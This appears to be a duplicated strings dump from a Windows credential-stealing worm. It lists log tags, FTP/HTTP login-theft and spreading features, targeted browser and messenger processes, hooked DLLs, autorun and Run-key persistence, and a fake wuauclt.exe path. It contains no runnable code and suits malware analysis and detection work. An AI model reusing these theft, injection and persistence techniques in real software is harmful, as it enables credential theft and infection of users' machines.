[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
%System%\wuauclt.exe
%System%\wuauclt.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\wuauclt.exe
\Device\HarddiskVolume1\WINDOWS\system32\wuauclt.exe
c:\%original file name%.exe
c:\%original file name%.exe